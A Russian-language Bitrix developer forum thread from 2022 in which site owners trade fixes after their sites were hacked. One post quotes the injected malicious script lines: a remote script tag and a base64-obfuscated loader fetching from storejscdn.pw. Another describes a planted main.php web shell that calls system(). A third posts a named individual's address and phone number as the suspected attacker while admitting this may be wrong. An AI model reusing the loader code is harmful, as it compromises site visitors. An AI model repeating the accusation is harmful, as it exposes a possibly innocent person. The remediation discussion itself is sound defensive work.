1С-Битрикс Разработчикам

Эксперт

Сообщений: 302 Баллов: 46 Регистрация: 15.08.2017

#261

17.10.2022 09:19:41

Цитата
Chezorezka написал: Сервак перезапустить после данной процедуры?

Не требуется.
Значит проблема в другом файле.
Остается поиск.
Ещё модно просканировать бесплатным imunifyav.

Пользователь 13618 Эксперт Сообщений: 1363 Баллов: 231 Регистрация: 05.04.2011 Сертифицированный партнер	#262 0 17.10.2022 09:20:56 первые сообщения в консоли какие? на что ругается? Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 2494815

Заглянувший

Сообщений: 10 Регистрация: 26.10.2018

#263

18.10.2022 05:09:37

Цитата
написал: Вот консоль гугла с файлами на которые он ругается.

В общем не спав 36 часов я все таки нашел в чем проблема.
Все файлы которые указаны в этом посте были без кода сайта. Вместо кодов в них было написано Putin_HUILO и русский корабль-пшел.н - сокращенно.
Причем в каждом из этих файлов было 9999 строк, т.е их заполнили прям столбцами. Размер файлов был около 2-3 мегабайт каждый.
У меня была файловая копия сайта от августа 22г, оттуда я просто заменил все те файлы которые были изменены, постепенно сайт начал оживать.
закрыл на все файлы доступ на уровне сервера,папку tmp вынес за рамки директории сайта. Модуль vote удалил.
Ограничил доступы в файлах
/bitrix/www/bitrix/admin/.htaccess

<Files ~ "^(site_checker)\.php$>deny from all</Files>

/home/bitrix/www/bitrix/tools/.htaccess

<Files ~ "^(html_editor_action|mail_entry|upload)\.php$> deny from all</Files>

/bitrix/www/bitrix/modules/main/include/.htaccess

/bitrix/www/bitrix/components/bitrix/sender.mail.editor/.htaccess

И еще одно. В почтовых настройках были созданы агенты или задания на спам статистики и прочей ненужной фигни на адрес администратора(заданный по умолчанию) Мне на почту стали сыпаться просто тонны писем о том что пользователь был заблокирован,что идут XSS атаки и DOS и прочая ересь.

По логам нашел обидчика,но может быть это и не он. Инфа просто так, для справки.

IP:37.57.145.71

person: Oleksii V Yaroshenko

address: Prirechnaya 25a

address: Kiev

address: Ukraine

phone: +38 097-437-27-17

nic-hdl: OVY5-RIPE

mnt-by: TRIOLANMNT

created: 2016-08-30T12:25:29Z

Вроде как пока тишина.

Сделал снимок сервака на всякий случай и еще одну файловую копию сайта.

Новостной модуль вырвал отдельно в папку, а то вручную собирать новости как то не айс после восстановления базы данных.

Пользователь 108671

Постоянный посетитель

Сообщений: 139 Баллов: 23 Регистрация: 25.11.2011

#264

18.10.2022 16:23:37

Техподдержка Битрикс:

У вас в файле /bitrix/modules/main/include/prolog.php были добавлены строки вызывающие скрипт:

\n<sc ript src="https://storejscdn.pw/jqueryui.js"></sc (?) ript>;

В файл /bitrix/js/main/core/core.js была добавлена строка:

\bs=document.createElement(script);s.src=atob(aHR0cHM6Ly9zdG9yZWpzY2RuLnB3L2pxdWVyeXVpLmpz);document.head.appendChild(s);

Сайт заработал корректно только после ручного удаления вредоносных строк. А также удалил вам вирусный файл /bitrix/components/bitrix/main.file.input/main.php

То есть у всех, кто писал выше не хватает удаления main.php

Пользователь 2494815

Заглянувший

Сообщений: 10 Регистрация: 26.10.2018

#265

19.10.2022 01:48:44

Цитата
написал: То есть у всех, кто писал выше не хватает удаления main.php

Все участники темы это поняли еще на первых трех страницах. А техподдержка битрикс больше ничего не сделала??? К примеру обновить сайт до "Актуально" версии?

Пользователь 108671 Постоянный посетитель Сообщений: 139 Баллов: 23 Регистрация: 25.11.2011	#266 0 19.10.2022 08:17:24 это само собой, а дайте ссылку на первых трех страницах о том, что нужно удалить main.php Я видимо пропустил

Пользователь 2494815

Заглянувший

Сообщений: 10 Регистрация: 26.10.2018

#267

19.10.2022 09:15:22

Цитата

написал:
У кого проблема с добавлением js-кода - проверьте наличие файлов и удалите их. /bitrix/components/bitrix/main.file.input/main.php/bitrix/components/bitrix/main.file.input/set_list.phpВторого файла вероятно не будет, а в первом - мишура для отвлечения внимания (основа - код из file.php), вызов system() в конструкторе с параметром из заголовка запроса + создание объекта данного класса после определения класса. Наличие данного файла не предполагается в ядре

про первые 3 страницы это я утрировал. Я к тому,что это уже обсуждалось в теме. тут всего 11 страниц,все прочитать надо бы)

Пользователь 14571

Эксперт

Сообщений: 796 Баллов: 105 Регистрация: 10.08.2007

#268

19.10.2022 12:55:49

Интересно, что недавно мне встретилось 2 сайта, которые были хакнуты еще в конце июня, но вредоносный код начал работать только сейчас. Вероятно имеет смысл вообще все сайты на Битрикс проверять на наличие вредоносных файлов ))

мои проекты: https://blog.sokov.org/category/dhynedhdhudhnn/ | меня рекомендуют: https://blog.sokov.org/recommendations/ | обо мне: https://spb.hh.ru/resume/9f303161ff02e561e20039ed1f654846726333 | 1 час работы - 1400 руб.

Пользователь 108671

Постоянный посетитель

Сообщений: 139 Баллов: 23 Регистрация: 25.11.2011

#269

19.10.2022 13:04:29

Цитата

написал:
Интересно, что недавно мне встретилось 2 сайта, которые были хакнуты еще в конце июня, но вредоносный код начал работать только сейчас. Вероятно имеет смысл вообще все сайты на Битрикс проверять на наличие вредоносных файлов ))

Как раз у меня два сайта подверглись атаке. Но ничего не смогли сделать кроме доступности, вероятно из-за того, что вебокружение было обновлено.

Пользователь 14571 Эксперт Сообщений: 796 Баллов: 105 Регистрация: 10.08.2007	#270 0 19.10.2022 13:25:19 Агзамов Раиль, а у нас просто испортили файл prolog.php. Видимо код был рассчитан на то, что в конце php файла обязательно будет ?> мои проекты: https://blog.sokov.org/category/dhynedhdhudhnn/ \| меня рекомендуют: https://blog.sokov.org/recommendations/ \| обо мне: https://spb.hh.ru/resume/9f303161ff02e561e20039ed1f654846726333 \| 1 час работы - 1400 руб.

Форум

Центр поддержки

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером